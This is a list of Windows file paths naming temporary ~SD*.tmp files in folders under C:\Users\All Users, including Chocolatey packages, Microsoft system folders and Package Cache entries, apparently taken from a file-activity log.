file: C:\Users\All Users\chocolatey\.chocolatey\openjdk.19.0.1\~SD79E5.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\powershell-core.7.3.0-rc1\~SD79E6.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\python3.3.8.10\~SD79E7.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\tapwindows.9.24.2\~SD79E8.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\vcredist140.14.32.31332\~SD79E9.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\vcredist2005.8.0.50727.619501\~SD79EA.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\vcredist2008.9.0.30729.616104\~SD79EB.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\vcredist2015.14.0.24215.20170201\~SD79EC.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\winrar.6.11.0.20220504\~SD79FC.tmp
file: C:\Users\All Users\chocolatey\bin\~SD79FD.tmp
file: C:\Users\All Users\chocolatey\config\~SD79FE.tmp
file: C:\Users\All Users\chocolatey\extensions\~SD79FF.tmp
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\~SD7A00.tmp
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\~SD7A01.tmp
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\~SD7A02.tmp
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\~SD7A13.tmp
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\~SD7A14.tmp
file: C:\Users\All Users\chocolatey\helpers\~SD7A15.tmp
file: C:\Users\All Users\chocolatey\helpers\functions\~SD7A16.tmp
file: C:\Users\All Users\chocolatey\lib\~SD7A65.tmp
file: C:\Users\All Users\chocolatey\lib\7zip\~SD7A76.tmp
file: C:\Users\All Users\chocolatey\lib\7zip.install\~SD7A86.tmp
file: C:\Users\All Users\chocolatey\lib\7zip.install\legal\~SD7A87.tmp
file: C:\Users\All Users\chocolatey\lib\7zip.install\tools\~SD7A98.tmp
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\~SD7A99.tmp
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\~SD7AA9.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter\~SD7ABA.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter\tools\~SD7ABB.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\~SD7ABC.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\~SD7ABD.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\~SD7ABE.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\~SD7ABF.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\~SD7AFF.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\~SD7B0F.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\~SD7B3F.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\~SD7B5F.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\~SD7C2B.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\~SD7C9A.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\~SD7D18.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\~SD7D19.tmp
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\~SD7D97.tmp
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\~SD7DF6.tmp
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\~SD7E83.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\~SD7ED2.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\~SD7EF3.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\~SD7F71.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey\~SD7FA0.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\~SD7FD0.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\~SD7FF1.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\~SD805F.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\~SD80AE.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\~SD80FD.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\~SD814C.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\~SD817C.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\~SD81CB.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\~SD820B.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet\~SD822B.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\~SD828A.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\~SD82AA.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\~SD82EA.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\~SD830A.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet-runtime\~SD831A.tmp
file: C:\Users\All Users\chocolatey\lib\dotnetfx\~SD832B.tmp
file: C:\Users\All Users\chocolatey\lib\dotnetfx\tools\~SD832C.tmp
file: C:\Users\All Users\chocolatey\lib\Firefox\~SD833D.tmp
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\~SD834D.tmp
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\~SD83AC.tmp
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\~SD83DC.tmp
file: C:\Users\All Users\chocolatey\lib\jre8\~SD843B.tmp
file: C:\Users\All Users\chocolatey\lib\jre8\tools\~SD847A.tmp
file: C:\Users\All Users\chocolatey\lib\KB2919355\~SD84E9.tmp
file: C:\Users\All Users\chocolatey\lib\KB2919355\tools\~SD8538.tmp
file: C:\Users\All Users\chocolatey\lib\KB2919442\~SD8539.tmp
file: C:\Users\All Users\chocolatey\lib\KB2919442\tools\~SD853A.tmp
file: C:\Users\All Users\chocolatey\lib\KB2999226\~SD8589.tmp
file: C:\Users\All Users\chocolatey\lib\KB2999226\tools\~SD85B9.tmp
file: C:\Users\All Users\chocolatey\lib\KB3033929\~SD8627.tmp
file: C:\Users\All Users\chocolatey\lib\KB3033929\Tools\~SD8686.tmp
file: C:\Users\All Users\chocolatey\lib\KB3035131\~SD86D5.tmp
file: C:\Users\All Users\chocolatey\lib\KB3035131\Tools\~SD86F5.tmp
file: C:\Users\All Users\chocolatey\lib\KB3063858\~SD8735.tmp
file: C:\Users\All Users\chocolatey\lib\KB3063858\Tools\~SD8765.tmp
file: C:\Users\All Users\chocolatey\lib\KB3118401\~SD87B4.tmp
file: C:\Users\All Users\chocolatey\lib\KB3118401\Tools\~SD87E4.tmp
file: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\~SD87E5.tmp
file: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\~SD87F5.tmp
file: C:\Users\All Users\chocolatey\lib\openjdk\~SD8806.tmp
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\~SD8884.tmp
file: C:\Users\All Users\chocolatey\lib\powershell-core\~SD8894.tmp
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\~SD88B5.tmp
file: C:\Users\All Users\chocolatey\lib\python3\~SD8904.tmp
file: C:\Users\All Users\chocolatey\lib\python3\legal\~SD8914.tmp
file: C:\Users\All Users\chocolatey\lib\python3\tools\~SD8944.tmp
file: C:\Users\All Users\chocolatey\lib\tapwindows\~SD8955.tmp
file: C:\Users\All Users\chocolatey\lib\tapwindows\tools\~SD8966.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist140\~SD8976.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\~SD89A6.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist2005\~SD89B7.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist2005\tools\~SD89C7.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist2008\~SD89C8.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist2008\tools\~SD89E9.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist2015\~SD8A28.tmp
file: C:\Users\All Users\chocolatey\lib\winrar\~SD8A96.tmp
file: C:\Users\All Users\chocolatey\lib\winrar\tools\~SD8AD6.tmp
file: C:\Users\All Users\chocolatey\lib-bad\~SD8B44.tmp
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\~SD8BA3.tmp
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\~SD8BE3.tmp
file: C:\Users\All Users\chocolatey\logs\~SD8C41.tmp
file: C:\Users\All Users\chocolatey\redirects\~SD8C90.tmp
file: C:\Users\All Users\chocolatey\tools\~SD8D4D.tmp
file: C:\Users\All Users\Microsoft\~SD8E19.tmp
file: C:\Users\All Users\Microsoft\Assistance\~SD8EA7.tmp
file: C:\Users\All Users\Microsoft\Assistance\Client\~SD8EB7.tmp
file: C:\Users\All Users\Microsoft\Assistance\Client\1.0\~SD8EF7.tmp
file: C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\~SD8F17.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\~SD8F47.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\~SD8F48.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\~SD8F49.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\~SD8F4A.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\~SD8F4B.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\~SD8F5C.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\~SD8F6C.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\ShortcutBackups\~SD8F8C.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\~SD8FDC.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\~SD902B.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\en-us.16\~SD90E7.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\x-none.16\~SD9117.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\UserData\~SD9147.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\~SD9186.tmp
file: C:\Users\All Users\Microsoft\Crypto\~SD91B6.tmp
file: C:\Users\All Users\Microsoft\Crypto\DSS\~SD91B7.tmp
file: C:\Users\All Users\Microsoft\Crypto\DSS\MachineKeys\~SD91B8.tmp
file: C:\Users\All Users\Microsoft\Crypto\Keys\~SD91B9.tmp
file: C:\Users\All Users\Microsoft\Crypto\PCPKSP\~SD91BA.tmp
file: C:\Users\All Users\Microsoft\Crypto\PCPKSP\WindowsAIK\~SD91BB.tmp
file: C:\Users\All Users\Microsoft\Crypto\RSA\~SD91BC.tmp
file: C:\Users\All Users\Microsoft\Crypto\RSA\MachineKeys\~SD91BD.tmp
file: C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\~SD91CE.tmp
file: C:\Users\All Users\Microsoft\Device Stage\~SD91CF.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Device\~SD91D0.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\~SD91D1.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\~SD91D2.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Task\~SD91D3.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\~SD91D4.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\~SD91F4.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\~SD9272.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\~SD92B2.tmp
file: C:\Users\All Users\Microsoft\DeviceSync\~SD92D2.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\~SD9302.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\AsimovUploader\~SD9341.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\~SD93B0.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\~SD93FF.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\~SD943E.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\AutoLogger\~SD945F.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\~SD94AE.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\LocalTraceStore\~SD951C.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\Sideload\~SD955C.tmp
file: C:\Users\All Users\Microsoft\DRM\~SD958B.tmp
file: C:\Users\All Users\Microsoft\DRM\Server\~SD95DB.tmp
file: C:\Users\All Users\Microsoft\EdgeUpdate\~SD962A.tmp
file: C:\Users\All Users\Microsoft\EdgeUpdate\Log\~SD9669.tmp
file: C:\Users\All Users\Microsoft\eHome\~SD9689.tmp
file: C:\Users\All Users\Microsoft\eHome\logs\~SD96E8.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\~SD9737.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\~SD9767.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\~SD9797.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\~SD97D7.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\Sysmon\~SD9835.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Views\~SD9884.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Views\ApplicationViewsRootNode\~SD98F3.tmp
file: C:\Users\All Users\Microsoft\IdentityCRL\~SD9913.tmp
file: C:\Users\All Users\Microsoft\Media Player\~SD9924.tmp
file: C:\Users\All Users\Microsoft\MF\~SD9925.tmp
file: C:\Users\All Users\Microsoft\Microsoft Security Client\~SD9926.tmp
file: C:\Users\All Users\Microsoft\Microsoft Security Client\Support\~SD9956.tmp
file: C:\Users\All Users\Microsoft\NetFramework\~SD9976.tmp
file: C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\~SD99E4.tmp
file: C:\Users\All Users\Microsoft\Network\~SD9AC0.tmp
file: C:\Users\All Users\Microsoft\Network\Connections\~SD9B0F.tmp
file: C:\Users\All Users\Microsoft\Network\Downloader\~SD9B3F.tmp
file: C:\Users\All Users\Microsoft\Office\~SD9B6F.tmp
file: C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\~SD9BED.tmp
file: C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\~SD9C6B.tmp
file: C:\Users\All Users\Microsoft\RAC\~SD9CCA.tmp
file: C:\Users\All Users\Microsoft\RAC\Outbound\~SD9D19.tmp
file: C:\Users\All Users\Microsoft\RAC\PublishedData\~SD9D39.tmp
file: C:\Users\All Users\Microsoft\RAC\StateData\~SD9DA7.tmp
file: C:\Users\All Users\Microsoft\RAC\Temp\~SD9DF6.tmp
file: C:\Users\All Users\Microsoft\Search\~SD9E26.tmp
file: C:\Users\All Users\Microsoft\Search\Data\~SD9E66.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\~SD9EC5.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\~SD9EC6.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Config\~SD9ED6.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\~SD9ED7.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\~SD9ED8.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\~SD9ED9.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\~SD9EDA.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\~SD9EDB.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\~SD9EDC.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\~SD9EFC.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\~SD9EFD.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Temp\~SD9EFE.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Temp\usgthrsvc\~SD9F0F.tmp
file: C:\Users\All Users\Microsoft\User Account Pictures\~SD9F10.tmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\~SD9F11.tmp
file: C:\Users\All Users\Microsoft\Vault\~SD9F12.tmp
file: C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\~SD9F13.tmp
file: C:\Users\All Users\Microsoft\Windows\~SD9F24.tmp
file: C:\Users\All Users\Microsoft\Windows\AIT\~SD9F25.tmp
file: C:\Users\All Users\Microsoft\Windows\Caches\~SD9F26.tmp
file: C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\~SD9F27.tmp
file: C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\~SD9F28.tmp
file: C:\Users\All Users\Microsoft\Windows\DRM\~SD9F58.tmp
file: C:\Users\All Users\Microsoft\Windows\DRM\Cache\~SD9F97.tmp
file: C:\Users\All Users\Microsoft\Windows\GameExplorer\~SD9FE6.tmp
file: C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\~SDA035.tmp
file: C:\Users\All Users\Microsoft\Windows\Ringtones\~SDA0C3.tmp
file: C:\Users\All Users\Microsoft\Windows\Sqm\~SDA1BE.tmp
file: C:\Users\All Users\Microsoft\Windows\Sqm\Manifest\~SDA1DE.tmp
file: C:\Users\All Users\Microsoft\Windows\Sqm\Sessions\~SDA21E.tmp
file: C:\Users\All Users\Microsoft\Windows\Sqm\Upload\~SDA22E.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\~SDA22F.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\~SDA230.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\~SDA260.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\~SDA2BF.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDA2FE.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDA33E.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\~SDA35E.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\~SDA3AD.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SDA3DD.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoHotkey\~SDA3FD.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Boxstarter\~SDA3FE.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\~SDA40F.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\~SDA420.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDA421.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\~SDA422.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\PowerShell\~SDA432.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 3.8\~SDA433.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SDA434.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\WinRAR\~SDA445.tmp
file: C:\Users\All Users\Microsoft\Windows\Templates\~SDA456.tmp
file: C:\Users\All Users\Microsoft\Windows\WER\~SDA4A5.tmp
file: C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\~SDA4F4.tmp
file: C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\~SDA543.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\~SDA563.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\~SDA583.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Backup\~SDA584.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Updates\~SDA585.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{8AF8DC04-1885-4F22-8F09-BD1E568EBC7A}\~SDA586.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\LocalCopy\~SDA587.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Quarantine\~SDA588.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\~SDA5B8.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\~SDA694.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\~SDA6F3.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\~SDA742.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\Resource\~SDA791.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\~SDA7D1.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Store\~SDA7D2.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Support\~SDA7E2.tmp
file: C:\Users\All Users\Microsoft\Windows NT\~SDA7E3.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\~SDA7E4.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\ActivityLog\~SDA7E5.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\~SDA7E6.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\~SDA7E7.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\Inbox\~SDA7F8.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\Queue\~SDA7F9.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\SentItems\~SDA7FA.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\~SDA7FB.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\~SDA7FC.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSScan\~SDA7FD.tmp
file: C:\Users\All Users\Microsoft\WwanSvc\~SDA83C.tmp
file: C:\Users\All Users\Microsoft OneDrive\~SDA83E.tmp
file: C:\Users\All Users\Microsoft OneDrive\setup\~SDA83F.tmp
file: C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\~SDA8CD.tmp
file: C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\~SDA8FD.tmp
file: C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\~SDA95C.tmp
file: C:\Users\All Users\Oracle\~SDA9AB.tmp
file: C:\Users\All Users\Oracle\Java\~SDA9FA.tmp
file: C:\Users\All Users\Oracle\Java\installcache\~SDAA2A.tmp
file: C:\Users\All Users\Oracle\Java\installcache_x64\~SDAA88.tmp
file: C:\Users\All Users\Package Cache\~SDAC7D.tmp
file: C:\Users\All Users\Package Cache\{0627E042-BBD1-4FE2-AAEF-C54BA4A69326}v3.8.10150.0\~SDAD1B.tmp
file: C:\Users\All Users\Package Cache\{08c3379c-d122-42a4-917e-b3dc470fbcb3}\~SDAD1C.tmp
file: C:\Users\All Users\Package Cache\{21F60B75-2A5E-4064-A38A-D59A347B4433}v3.8.10150.0\~SDAD1D.tmp
file: C:\Users\All Users\Package Cache\{2dd73f73-784c-4c71-9495-fd11cd6eddf6}\~SDAD1E.tmp
file: C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\~SDAD3E.tmp
file: C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\~SDAD8D.tmp
file: C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\vcRuntimeMinimum_amd64\~SDADEC.tmp
file: C:\Users\All Users\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}\~SDAE99.tmp
file: C:\Users\All Users\Package Cache\{4196628C-AE5C-4304-B166-B7C1E93CDC25}v3.8.10150.0\~SDAF07.tmp
file: C:\Users\All Users\Package Cache\{4AF94EBC-F592-4502-B0EA-07764E7F820B}v3.8.10150.0\~SDAF47.tmp
file: C:\Users\All Users\Package Cache\{4CA4F71B-58C3-42ED-83FA-AD7AC9E9C0CB}v48.47.50420\~SDAF96.tmp
file: C:\Users\All Users\Package Cache\{54DE7EA9-E391-4BD2-A373-3A72A18EBDB5}v40.68.31213\~SDAFE5.tmp
file: C:\Users\All Users\Package Cache\{59650A2A-3839-46EC-9D9C-6B3B1C743C55}v40.68.31213\~SDB024.tmp
file: C:\Users\All Users\Package Cache\{5A66E598-37BD-4C8A-A7CB-A71C32ABCD78}v40.68.31213\~SDB054.tmp
file: C:\Users\All Users\Package Cache\{5E63E49B-C88C-46C5-855C-A7B07C11CDC8}v48.47.50420\~SDB074.tmp
file: C:\Users\All Users\Package Cache\{81CDF5BF-4777-4CF8-B6CC-0902061F7314}v3.8.7427.0\~SDB0C4.tmp
file: C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\~SDB113.tmp
file: C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\~SDB162.tmp
file: C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\vcRuntimeAdditional_x86\~SDB1A1.tmp
file: C:\Users\All Users\Package Cache\{8BA25391-0BE6-443A-8EBF-86A29BAFC479}v40.68.31213\~SDB200.tmp
file: C:\Users\All Users\Package Cache\{94EE74AD-4205-4038-8748-000D966FA407}v48.47.50420\~SDB24F.tmp
file: C:\Users\All Users\Package Cache\{a699b48e-5748-4980-ad92-0b61b1d9d718}\~SDB26F.tmp
file: C:\Users\All Users\Package Cache\{a98dc6ff-d360-4878-9f0a-915eba86eaf3}\~SDB2FD.tmp
file: C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\~SDB32D.tmp
file: C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\~SDB34D.tmp
file: C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\vcRuntimeMinimum_x86\~SDB36D.tmp
file: C:\Users\All Users\Package Cache\{AF01038B-6523-4EA7-9D9E-4F1E2927D88B}v40.68.31213\~SDB3CC.tmp
file: C:\Users\All Users\Package Cache\{B87AB233-E9C5-4459-8E4A-952EACECCFC4}v48.47.50420\~SDB40C.tmp
file: C:\Users\All Users\Package Cache\{B92B890A-04F2-4880-BA20-20D4364FB263}v48.47.50420\~SDB42C.tmp
file: C:\Users\All Users\Package Cache\{C3DD1448-513A-4DB8-978D-6991562EA63D}v48.47.50420\~SDB46B.tmp
file: C:\Users\All Users\Package Cache\{CD1C027B-BC87-4C8E-993D-1779A12BF141}v3.8.10150.0\~SDB4AB.tmp
file: C:\Users\All Users\Package Cache\{D9D74D16-6E0C-417B-AA63-557EEED5AED1}v3.8.10150.0\~SDB4CB.tmp
file: C:\Users\All Users\Package Cache\{DF5D4A27-B019-41FB-ACA8-62EE9947F452}v3.8.10150.0\~SDB50B.tmp
file: C:\Users\All Users\Package Cache\{E663ED1E-899C-40E8-91D0-8D37B95E3C69}v40.68.31213\~SDB53B.tmp
file: C:\Users\All Users\Package Cache\{E8900394-218B-459F-98DC-75B0FD88CC80}v3.8.10150.0\~SDB58A.tmp
file: C:\Users\All Users\Package Cache\{EFDAD3B5-AE93-48A4-BE3E-40EEFC4F100A}v3.8.10150.0\~SDB5BA.tmp
